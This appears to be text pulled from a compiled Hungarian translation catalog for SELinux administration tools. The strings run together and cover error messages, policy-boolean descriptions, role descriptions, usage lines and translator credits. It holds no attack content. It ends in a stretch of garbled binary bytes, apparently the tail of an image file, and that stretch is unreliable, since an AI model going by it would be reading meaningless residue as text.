Copyright (c) 2006 Dan Walsh <dwalsh@redhat.com>Nem sikerült felvenni "%s" SELinux-felhasználótNem adható hozzá %s addrNem sikerült felvenni fájlkontextust ehhez: %sNem sikerült felvenni ezt a csatolót: %sNem sikerült felvenni bejelentkezési hozzárendelést ehhez: %sNem sikerült felvenni ezt a portot: %s/%sNem sikerült felvenni "%s" előtagot ehhez: %sNem sikerült felvenni "%s" szerepet ehhez: %sNem sikerült ellenőrizni, hogy van-e definiálva "%s" SELinux-felhasználóNem sikerült ellenőrizni, hogy definiálva van-e a(z) %sNem sikerült ellenőrizni, hogy "%s" logikai érték definiálva van-eNem sikerült ellenőrizni, hogy van-e definiálva fájlkontextus ehhez: %sNem sikerült ellenőrizni, hogy definiálva van-e ez a csatoló: %sNem sikerült ellenőrizni, hogy van-e definiálva bejelentkezési hozzárendelés ehhez: %sNem sikerült ellenőrizni, hogy definiálva van-e a(z) %s/%s portNem sikerült lezárni a leírókat.
Nem sikerült véglegesíteni az Semanage-tranzakciótNem sikerült létrehozni SELinux-felhasználót ehhez: %sNem sikerült létrehozni kulcsot ehhez: %sNem sikerült létrehozni kulcsot ehhez: %s/%sNem sikerült létrehozni addr-t %s-hezNem sikerült létrehozni kontextust ehhez: %sNem sikerült létrehozni kontextust ehhez: %s/%sNem sikerült létrehozni fájlkontextust ehhez: %sNem sikerült létrehozni csatolót ehhez: %sNem sikerült létrehozni kulcsot ehhez: %sNem sikerült létrehozni bejelentkezési hozzárendelést ehhez: %sNem sikerült létrehozni portot ehhez: %s/%sNem sikerült létrehozni az Semanage kezelőtNem sikerült törölni a(z) "%s" SELinux-felhasználótNem törölhető %s addrNem sikerült törölni a(z) "%s" logikai értéketNem sikerült törölni %s fájlkontextusátNem sikerült törölni ezt a csatolót: %sNem sikerült törölni "%s" bejelentkezési hozzárendelésétNem sikerült törölni ezt a portot: %s/%sNem sikerült a(z) %s fájl kontextus törléseNem sikerült törölni a portot: %sNem sikerült meghatározni a kikényszerítési módot.
Nem sikerült létrehozni Semanage-kapcsolatotNem sikerült kinyerni a kulcsot ehhez: %sNem sikerült listázni az SELinux modulokatNem sikerült listázni az SELinux-felhasználókatNem listázható addrNem sikerült listázni a logikai értékeketNem sikerült listázni a fájlkontextusokatNem sikerült listázni a csatolókatNem sikerült listázni a helyi fájlkontextusokatNem sikerült listázni a bejelentkezési hozzárendeléseketNem sikerült listázni a portokatNem sikerült listázni a(z) "%s" felhasználó szerepeitA fájl kontextus listázása nem sikerültNem sikerült listázni a portokatNem sikerült módosítani a(z) "%s" SELinux-felhasználótNem módosítható %s addrNem sikerült módosítani a(z) "%s" logikai értéketNem sikerült módosítani a fájlkontextust ehhez: %sNem sikerült módosítani ezt a csatolót: %sNem sikerült módosítani "%s" bejelentkezési hozzárendelésétNem sikerült módosítani ezt a portot: %s/%sNem sikerült megnyitni ezt a fájlt: %s
Nem kérdezhető le %s addrNem sikerült lekérdezni a fájlkontextust ehhez: %sNem sikerült lekérdezni a fájlkontextust ehhez: %sNem sikerült lekérdezni ezt a csatolót: %sNem sikerült lekérdezni ezt a portot: %s/%sNem sikerült végrehajtani Seuser-lekérdezést erre: %sNem sikerült lekérdezni a felhasználót ehhez: %sNem törölhető a megengedő tartomány %s (sikertelen eltávolítás)Nem sikerült beállítani az MLS-szintet ehhez: %sNem sikerült MLS-tartományt beállítani ehhez: %sNem sikerült SELinux-felhasználót beállítani ehhez: %sNem lehet beállítani az aktív logikai értéket %sNem sikerült beállítani a(z) %s addr kontextustNem sikerült beállítani a végrehajtási kontextust erre: %s.
Nem sikerült beállítani a fájlkontextust ehhez: %sNem sikerült beállítani a csatolókontextust ehhez: %sNem állítható be a(z) %s maszkjaNem sikerült beállítani az üzenetkontextust ehhez: %sNem sikerült beállítani az MLS-mezőket %s addr kontextusbanNem sikerült beállítani az MLS-mezőket %s fájlkontextusbanNem sikerült beállítani az MLS-mezőket %s csatolókontextusbanNem sikerült beállítani az MLS-mezőket %s/%s portkontextusbanNem sikerült nevet beállítani ehhez: %sNem állítható be a megengedő tartomány %s (sikertelen modul telepítés)Nem sikerült beállítani a portkontextust ehhez: %s/%sNem sikerült beállítani a szerepet %s addr kontextusbanNem sikerült beállítani a szerepet %s fájlkontextusbanNem sikerült beállítani a szerepet %s csatolókontextusbanNem sikerült beállítani a szerepet %s/%s portkontextusbanNem sikerült beállítani a típust %s addr kontextusbanNem sikerült beállítani a típust %s fájlkontextusbanNem sikerült beállítani a típust %s csatolókontextusbanNem sikerült beállítani a típust %s/%s portkontextusbanNem sikerült beállítani a felhasználót %s addr kontextusbanNem sikerült beállítani a felhasználót %s fájlkontextusbanNem sikerült beállítani a felhasználót %s csatolókontextusbanNem sikerült beállítani a felhasználót %s/%s portkontextusbanNem sikerült elindítani az Semanage-tranzakciótNem sikerült meghatározni az alapértelmezett típust.
Ideiglenes fájlok létrehozása/módosítása a /tmp-benCronJelenlegi kikényszerítő módTestre szabottDBUS rendszer-démonAdatbázisok%s törléseFájlkontextus törléseHálózati port törléseSELinux felhasználó hozzárendelés törléseFelhasználó törléseLeírásAudit letiltásaA Fürt Kiszolgáló SELinux védelmének kikapcsolásaAz Evolution SELinux védelmének kikapcsolásaA Hal démon SELinux védelmének kikapcsolásaAz NIS Jelszó Démon SELinux védelmének kikapcsolásaAz NIS Transzfer Démon SELinux védelmének kikapcsolásaA Hálózatkezelő SELinux védelmének kikapcsolásaA Thunderbird SELinux védelmének kikapcsolásaAz acct démon SELinux védelmének letiltásaAz amanda SELinux védelmének kikapcsolásaAz amavis SELinux védelmének kikapcsolásaAz apmd démon SELinux védelmének kikapcsolásaAz arpwatch démon SELinux védelmének kikapcsolásaAz auditd démon SELinux védelmének kikapcsolásaAz automount démon SELinux védelmének kikapcsolásaAz avachi SELinux védelmének kikapcsolásaA bluetooth démon SELinux védelmének kikapcsolásaA canna démon SELinux védelmének kikapcsolásaA cardmgr démon SELinux védelmének kikapcsolásaA ciped démon SELinux védelmének kikapcsolásaA clamd démon SELinux védelmének kikapcsolásaA clamscan SELinux védelmének kikapcsolásaA clvmd SELinux védelmének kikapcsolásaA comstat démon SELinux védelmének kikapcsolásaA courier démon SELinux védelmének kikapcsolásaA cpucontrol démon SELinux védelmének kikapcsolásaA cpuspeed SELinux védelmének kikapcsolásaA crond SELinux védelmének kikapcsolásaA cups hplib démon SELinux védelmének kikapcsolásaA cupsd back end kiszolgáló SELinux védelmének kikapcsolásaA cupsd démon SELinux védelmének kikapcsolásaA cupsd_lpd SELinux védelmének kikapcsolásaA cvs démon SELinux védelmének kikapcsolásaA cyrus démon SELinux védelmének kikapcsolásaA dbskkd démon SELinux védelmének kikapcsolásaA dbus démon SELinux védelmének kikapcsolásaA dccd SELinux védelmének kikapcsolásaA dccifd SELinux védelmének kikapcsolásaA dccm SELinux védelmének kikapcsolásaA ddt démon SELinux védelmének kikapcsolásaA devfsd démon SELinux védelmének kikapcsolásaA dhcpc démon SELinux védelmének kikapcsolásaA dhcpd démon SELinux védelmének kikapcsolásaA dictd démon SELinux védelmének kikapcsolásaA distccd démon SELinux védelmének kikapcsolásaA dmesg démon SELinux védelmének kikapcsolásaA dnsmasq démon SELinux védelmének kikapcsolásaA dovecot démon SELinux védelmének kikapcsolásaAz entropyd démon SELinux védelmének kikapcsolásaA fetchmail SELinux védelmének kikapcsolásaA fingerd démon SELinux védelmének kikapcsolásaA freshclam démon SELinux védelmének kikapcsolásaAz fsdaemon démon SELinux védelmének kikapcsolásaA játékok SELinux védelmének kikapcsolásaA gpm démon SELinux védelmének kikapcsolásaA gss démon SELinux védelmének kikapcsolásaA hostname démon SELinux védelmének kikapcsolásaA hotplug démon SELinux védelmének kikapcsolásaA howl démon SELinux védelmének kikapcsolásaA http suexec SELinux védelmének kikapcsolásaA httpd rotatelogs SELinux védelmének kikapcsolásaA hwclock démon SELinux védelmének kikapcsolásaAz i18n démon SELinux védelmének kikapcsolásaAz imazesrv démon SELinux védelmének kikapcsolásaAz inetd gyermek démonainak SELinux védelmének kikapcsolásaAz inetd démon SELinux védelmének kikapcsolásaAz innd démon SELinux védelmének kikapcsolásaAz iptables démon SELinux védelmének kikapcsolásaAz ircd démon SELinux védelmének kikapcsolásaAz irqbalance démon SELinux védelmének kikapcsolásaAz iscsi démon SELinux védelmének kikapcsolásaA jabberd démon SELinux védelmének kikapcsolásaA kabmid démon SELinux védelmének kikapcsolásaA klogd démon SELinux védelmének kikapcsolásaA krb5kdc démon SELinux védelmének kikapcsolásaA ktalk SELinux védelmének kikapcsolásaA kudzu démon SELinux védelmének kikapcsolásaA locate démon SELinux védelmének kikapcsolásaZ lpd démon SELinux védelmének kikapcsolásaAz lrrd SELinux védelmének kikapcsolásaAz lvm démon SELinux védelmének kikapcsolásaA mailman SELinux védelmének kikapcsolásaAz mdadm démon SELinux védelmének kikapcsolásaA monopd démon SELinux védelmének kikapcsolásaAz mrtg démon SELinux védelmének kikapcsolásaA mysqld démon SELinux védelmének kikapcsolásaA nagios démon SELinux védelmének kikapcsolásaA named démon SELinux védelmének kikapcsolásaA nessusd démon SELinux védelmének kikapcsolásaAz nfsd démon SELinux védelmének kikapcsolásaAz nmbd démon SELinux védelmének kikapcsolásaAz nrpe démon SELinux védelmének kikapcsolásaAz nscd démon SELinux védelmének kikapcsolásaAz nsd démon SELinux védelmének kikapcsolásaAz ntpd démon SELinux védelmének kikapcsolásaAz oddjob SELinux védelmének kikapcsolásaAz oddjob_mkhomedir SELinux védelmének kikapcsolásaAz openvpn démon SELinux védelmének kikapcsolásaA pam démon SELinux védelmének kikapcsolásaA pegasus SELinux védelmének kikapcsolásaA perdition démon SELinux védelmének kikapcsolásaA portmap démon SELinux védelmének kikapcsolásaA portslave démon SELinux védelmének kikapcsolásaA postfix SELinux védelmének kikapcsolásaA postgresql démon SELinux védelmének kikapcsolásaA pptp SELinux védelmének kikapcsolásaA prelink démon SELinux védelmének kikapcsolásaA privoxy démon SELinux védelmének kikapcsolásaA ptal démon SELinux védelmének kikapcsolásaA pxe démon SELinux védelmének kikapcsolásaA pyzord démon SELinux védelmének kikapcsolásaA quota démon SELinux védelmének kikapcsolásaA radiusd démon SELinux védelmének kikapcsolásaA radvd démon SELinux védelmének kikapcsolásaAz rdisc SELinux védelmének kikapcsolásaA readahead SELinux védelmének kikapcsolásaA restorecond SELinux védelmének kikapcsolásaAz rhgb démon SELinux védelmének kikapcsolásaA ricci SELinux védelmének kikapcsolásaA ricci_modclustered SELinux védelmének kikapcsolásaAz rlogin démon SELinux védelmének kikapcsolásaAz rpcd démon SELinux védelmének kikapcsolásaAz rshd SELinux védelmének kikapcsolásaAz rsync démon SELinux védelmének kikapcsolásaAz saslauthd démon SELinux védelmének kikapcsolásaA scannerdaemon démon SELinux védelmének kikapcsolásaA sendmail démon SELinux védelmének kikapcsolásaAz setrans SELinux védelmének kikapcsolásaAz setroubleshoot démon SELinux védelmének kikapcsolásaA slapd démon SELinux védelmének kikapcsolásaAz slrnpull démon SELinux védelmének kikapcsolásaAz smbd démon SELinux védelmének kikapcsolásaAz snmpd démon SELinux védelmének kikapcsolásaA snort démon SELinux védelmének kikapcsolásaA sound démon SELinux védelmének kikapcsolásaA soundd démon SELinux védelmének kikapcsolásaA spamd démon SELinux védelmének kikapcsolásaA speedmgmt démon SELinux védelmének kikapcsolásaA squid démon SELinux védelmének kikapcsolásaAz ssh démon SELinux védelmének kikapcsolásaAz stunnel démon SELinux védelmének kikapcsolásaA swat démon SELinux védelmének kikapcsolásaA sxid démon SELinux védelmének kikapcsolásaA syslogd démon SELinux védelmének kikapcsolásaA rendszer cron feladatok SELinux védelmének kikapcsolásaA tcp démon SELinux védelmének kikapcsolásaA telnet démon SELinux védelmének kikapcsolásaA tftpd démon SELinux védelmének kikapcsolásaA webböngészők SELinux védelmének kikapcsolásaA transproxy démon SELinux védelmének kikapcsolásaAz udev démon SELinux védelmének kikapcsolásaAz uml démon SELinux védelmének kikapcsolásaAz updfstab démon SELinux védelmének kikapcsolásaAz uptimed démon SELinux védelmének kikapcsolásaAz uucpd démon SELinux védelmének kikapcsolásaA vmware démon SELinux védelmének kikapcsolásaA watchdog démon SELinux védelmének kikapcsolásaA winbind démon SELinux védelmének kikapcsolásaAz xdm démon SELinux védelmének kikapcsolásaA xen vezérlés SELinux védelmének kikapcsolásaA xen démon SELinux védelmének kikapcsolásaAz xfs démon SELinux védelmének kikapcsolásaAz ypbind démon SELinux védelmének kikapcsolásaAz ypserv démon SELinux védelmének kikapcsolásaKikapcsolvaKikapcsolva
Megengedő
Kikényszerítő
Ne engedélyezze bármely folyamatnak, hogy kernelmodulokat töltsön beNe engedélyezze bármely folyamatnak az kernel SELinux házirend módosításátNe engedélyezzen átmenetet a sysadm_t-ba, sudo és su eseténNe vizsgáljon olyan dolgokat, amelyekről tudjuk, hogy hibásak, de nem jelentenek biztonsági réstHálózati port szerkesztéseAudit engedélyezéseEngedélyezze/Tiltsa le a további vizsgálati szabályokat, amelyek normálisan nincsenek jelentve a napló fájlokban.KikényszerítőAdja meg a korlátozandó futtatható állomány teljes elérési útvonalát.Adja meg a korlátozott alkalmazás futtatásához használt init szkript teljes elérési útvonalát.Adja meg a korlátozott alkalmazás vagy felhasználói szerep egyedi nevét.Memóriafoglalási hiba.
Hiba a parancsértelmező argv0-jának lefoglalásakor.
Hiba a uid módosításakor; megszakítás.
Hiba az auditálási rendszerhez való csatlakozáskor.
Hiba a SETUID képesség eldobásakor; megszakítás.
Hiba a képességek eldobásakor; megszakítás.
Hiba a képességek felszabadításakor
Hiba a KEEPCAPS visszaállításakor; megszakítás.
Hiba az auditálási üzenet küldésekor.
Hiba a KEEPCAPS beállításakor; megszakítás.
Hiba a képességek beállításakor; megszakítás.
Hiba: nem lehet megnyitni ezt: %s.
Hiba: a parancsértelmező érvénytelen.
Hiba: több szint lett megadva
Hiba: több szerep lett megadva
Hiba: több típus lett megadva
Hiba: nem változtathat szinteket nem biztonságos terminálon keresztül 
Végrehajtható fájlLétező Felhasználói SzerepekLétező_FelhasználóNem sikerült megfelelően bezárni a tty-t
Fájl
SpecifikációFájl
TípusFájl kontextus fájlFájl címkézésFájl SpecifikációFájltípus%s fájlkontextusa szabályzatban van definiálva - nem törölhetőNincs definiálva fájlkontextus ehhez: %sSzűrőGPLJátékokÚj házirend modul generálásaCsoportnézetHTTPD SzolgáltatásInit szkriptKölcsönhatás a terminállalA(z) %s csatoló szabályzatban van definiálva - nem törölhető%s csatoló nincs definiálvaInterfész fájlInternet Szolgáltatások Démon (inetd)Az Internet Szolgáltatás Démonok a xinetd által indított démonokÉrvénytelen fájl specifikációKerberosCímkézésA %s Linux csoport nem létezikNem létezik %s nevű Linux-felhasználóListanézetHázirend Modul BetöltéseHázirend modul betöltéseZárolás...Bejelentkezési
NévBejelentkezés '%s' szükségesBejelentkezési név%s bejelentkezési hozzárendelése szabályzatban van definiálva - nem törölhetőNincs definiálva bejelentkezési hozzárendelés ehhez: %sMCS SzintMCS hatáskörMLSMLS/MLS/
MCS hatáskörMLS/MCS
SzintMLS/MCS hatáskörMemória VédelemMinimális Terminál Felhasználói SzerepMinimális X Ablakok Felhasználói Szerep%s módosításaFájlkontextus módosításaSELinux felhasználó hozzárendelés szerkesztéseFelhasználó módosításaEgy létező felhasználói bejelentkező rekord módosítása.A(z) %s.pp modul már be van töltve az aktuális házirendbe.
Folytatja?ModulnévFelkapcsolásNFSNISNévNév Szolgáltatás:Hálózati beállításokHálózati portNincs kontextus ebben a fájlban: %s
Csomópont cím szükségesCsomópont hálózati maszk szükségesMég nincs megvalósítva.Hiba az opciókban: %s Elfogyott a memória.
Jelszó:MegengedőPolgenHázirend KönyvtárHázirend modulPortA(z) %s/%s port már definiálva vanA(z) %s/%s port szabályzatban van definiálva - nem törölhető%s/%s port nincs definiálvaPortszámMeg kell adni portotA port szám "%s" nem érvényes.  0 < PORT_SZÁM < 65536 A portoknak számoknak vagy számok tartományának kell lennie 1 és %d közöttElőtagNyomtatásTartomány feldolgozásaProtoProtokollUDP vagy TCP protokoll szükségesRed Hat 2007Újracímkézés a következő újraindításkor.A betölthető házirend modul eltávolításaLegalább 1 kategóriát igényelSzükség van előtagra vagy szerepekreSzükség van előtagra, szerepekre, szintre vagy tartományraSetype szükségesSetype vagy Serange szükségesSetype, Serange vagy Seuser szükségesSeuser vagy Serange szükségesA logikai beállítások visszaállítása alapértelmezettreSzerepAlapvető Adminisztrátori Felhasználói SzerepA logikai értékeket lezáró varázsló futtatásaSASL hitelesítő kiszolgálóSELinux
FelhasználóSELinux AdminisztrációSELinux InterfészSELinux Házirend Generációs EszközSELinux Port
TípusSELinux Port típusSELinux szerepekSELinux SzolgáltatásvédelemSELinux típusMeg kell adni SELinux-típustSELinux felhasználóSELinux Logikai értékSELinux fkörnyezetAz SELinux-szabályzat nem kezelt, vagy nem lehet elérni a tárolót."%s" SELinux-felhasználó szabályzatban van definiálva - nem törölhető"%s" SELinux-felhasználó nincs definiálvaSELinux felhasználó '%s' szükségesSSHSambaMenedzsment objektum kiválasztásaPortok kiválasztásaVálassza az alapvető adminisztrátor felhasználói szerepet, ha ez a felhasználó fogja igazgatni a gépet, ha rendszergazdaként futtatja. Ez a felhasználó nem fog tudni bejelentkezni a rendszerbe közvetlenül.Válassza ki a könyvtárat a házirend fájlok generálásáraVálassza ki a korlátozott alkalmazás által birtokolt és írt könyvtár(ak)atVálassza ki a korlátozandó futtatható fájlt.Válassza ki a korlátozott alkalmazás által létrehozott vagy írt fájl(oka)tVálassza ki, ha újra szeretné címkézni az egész fájlrendszert a következő újraindításkor.  Az újracímkézés hosszú időt vehet igénybe a fájlrendszer méretétől függően.  Ha megváltoztatja a házirend típusát, vagy kikapcsolt állapotról vált kikényszerítőre, akkor újracímkézésre van szükség.Válassza ki a korlátozandó init szkript fájlt.Válassza ki a tartományokat, amelyeket szeretné, hogy ez a felhasználó igazgasson.Válassza ki a felhasználói szerepeket, amelyek átmenetet fognak képezni ezen alkalmazás tartományába.Selinux
FájltípusAudit üzenetek küldéseEmailt küldBeállító parancsfájlA -l használata SELinux MLS-támogatás esetén lehetséges.
A newrole funkció csak SELinux-kernelen használható.
A run_init funkció csak SELinux-kernelen használható.
Levélszemét VédelemSquidSzabványos Init DémonA szabványos Init Démonok olyan démonok, amelyeket a boot során indítanak init szkriptekkel. Általában szükség van egy szkriptre a /etc/rc.d/init.d-benÁllapotRendszer alapértelmezett kikényszerítő módRendszer alapértelmezett házirend típus:Ez a felhasználó csak X-szel vagy terminállal tud bejelentkezni. Alapértelmezetten ennek a felhasználónak nem lesz setuid-je, hálózata, sudo-ja, su-ja.Ez a felhasználó csak terminállal vagy távoli bejelentkezéssel tud bejelentkezni. Alapértelmezetten ennek a felhasználónak nem lesz setuid-je, hálózata, su-ja, sudo-ja.Ezen házirend aktiválásához futtassa:Átkapcsolás testre szabott és Minden logikai érték közöttÁtkapcsolás Testre szabott ás Minden Port közöttÁtváltás minden és testre szabott fájl kontextus közöttA staff SELinux felhasználó átmenete Webböngésző tartománybaA sysadm SELinux felhasználó átmenete Webböngésző tartománybaA user SELinux felhasználó átmenete Webböngésző tartománybaAz xguest SELinux felhasználó átmenete Webböngésző tartománybaA %s_t típus már definiálva van ebben a házirendben.
Folytatja?Típus kikényszerítés fájlMeg kell adni típustHasználat: run_init <szkript> <argumentumok ...>
  ahol <szkript> a futtatandó inicializálási szkript neve,
       <argumentumok ...> pedig ezen szkript argumentumai.Nem sikerült memóriát foglalni a new_context számáraNem sikerült törölni a környezetet
Nem sikerült üres szignálkészletet szerezni
Nem sikerült visszaállítani a környezetet; megszakítás
Nem sikerült visszaállítani a tty-címkét.
Nem sikerült beállítani SIGHUP-kezelőt
Univerzális SSL alagútIsmeretlen vagy hiányzó protokollNem fenntartott portok (>1024)Használat: %s -LHasználat: %s -L -l felhasználóHasználat: %s -d fájl ...Használat: %s -l -d felhasználó ...Használat: %s -l kategória felhasználó ...Használat: %s -l [[+|-]kategória],...]q felhasználó ...Használat: %s kategória fájl ...Használat: %s [[+|-]kategória],...]q fájl ...Az argumentumlista a -- jellel zárható le. Példa:Felhasználói AlkalmazásFelhasználói alkalmazás bármelyik olyan alkalmazás, amelyet korlátozni szeretne és egy felhasználó indítottFelhasználó hozzárendelésFelhasználói kiváltságokFelhasználói SzerepFelhasználó teljes hálózati eléréssel, setuid nélkül átmenet mentes alkalmazásokkal, su nélkül, használhat sudo-t az alapvető adminisztrációs szerepekhezFelhasználó teljes hálózati eléréssel, setuid nélkül átmenet mentes alkalmazásokkal, sudo nélkül, su nélkül.PAM-et használ a hitelesítéshezDBus-t használNsswith vagy getpw* hívásokat használNév megerősítéseVerzióFigyelem! Nem sikerült lekérdezni a tty információt.
Figyelmeztetés: nem sikerült visszaállítani a kontextust ehhez: %s
Webalkalmazás/Szkript (CGI)WebalkalmazásokWeb alkalmazások/Szkriptek (CGI) a webkiszolgáló (apache) által indított CGI szkriptekRendszernapló üzeneteket ír	XENX-KiszolgálóLegalább egy szerepet meg kell adnia %s számáraEgy futtatható fájlt kell megadniaMeg kell adnia egy nevet a korlátozott folyamat/felhasználó számáraMeg kell adnia a futtatható elérési útvonalát a korlátozott folyamata számáraKi kell választania egy felhasználótA következő értékek egyikét kell megadnia: %s_Törlés_Tulajdonságokmindenminden fájl
átlagos fájl
könyvtár
karakteres eszköz
blokk eszköz
csatlakozó
szimbolikus link
nevesített csővezeték
Az azonosítás nem sikerült.
Érvényes bejegyzés nem található a jelszófájlban.
chcat -- -Bizalmas /docs/üzletiterv.odtchcat -l +Bizalmas felhasználó1hiba a PAM szolgáltatás beállításakor.
nem sikerült új tartományt készíteni ezzel a szinttel: %s
nem sikerült szöveggé alakítani az új kontextust
nem sikerült végrehajtani a parancsértelmezőt
nem sikerült lekérdezni a felhasználói információkat
Nem sikerült meghatározni az új kontextust.
Nem sikerült meghatározni a régi kontextust.
nem sikerült inicializálni a PAM-et
nem sikerült beállítani ezt: PAM_TTY
nem sikerült beállítani ezt az új tartományt: %s
nem sikerült beállítani ezt az új szerepet: %s
nem sikerült beállítani ezt az új típust: %s
A getpass nem tudja megnyitni ezt: /dev/tty
globálislabel37label38label39label41label42label44label50label59newrole: %s: hiba a(z) %lu. sorban
newrole: nem sikerült létrehozni új folyamatot: %snewrole: helytelen jelszó ehhez a felhasználóhoz: %s
newrole: szolgáltatásnév beállító hasító tábla túlcsordulás
kibepppdrsyncrun_init: helytelen jelszó ehhez a felhasználóhoz: %s
system-config-selinuxBán Szabolcs <shooby@gnome.hu>
Dvornik László <dvornik@gnome.hu>
Kelemen Gábor <kelemeng@gnome.hu>
Kovács Emese <emese@gnome.hu>
Nagy Gergely <greg@gnome.hu>
Nagy István Zoltán <nagyesta@gmail.com>
Tímár András <timar@gnome.hu>
Varga Szabolcs <shirokuma@shirokuma.hu>

Launchpad Contributions:
  Daniel Ugra https://launchpad.net/~daniel-ugra
  Gabor Kelemen https://launchpad.net/~kelemeng
  Karoly Gossler https://launchpad.net/~connor
  Robert Biro https://launchpad.net/~darthjdgTípusismeretlenHasználat: %s [-qi]
a use_syslog értékének logikainak kell lennie.
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`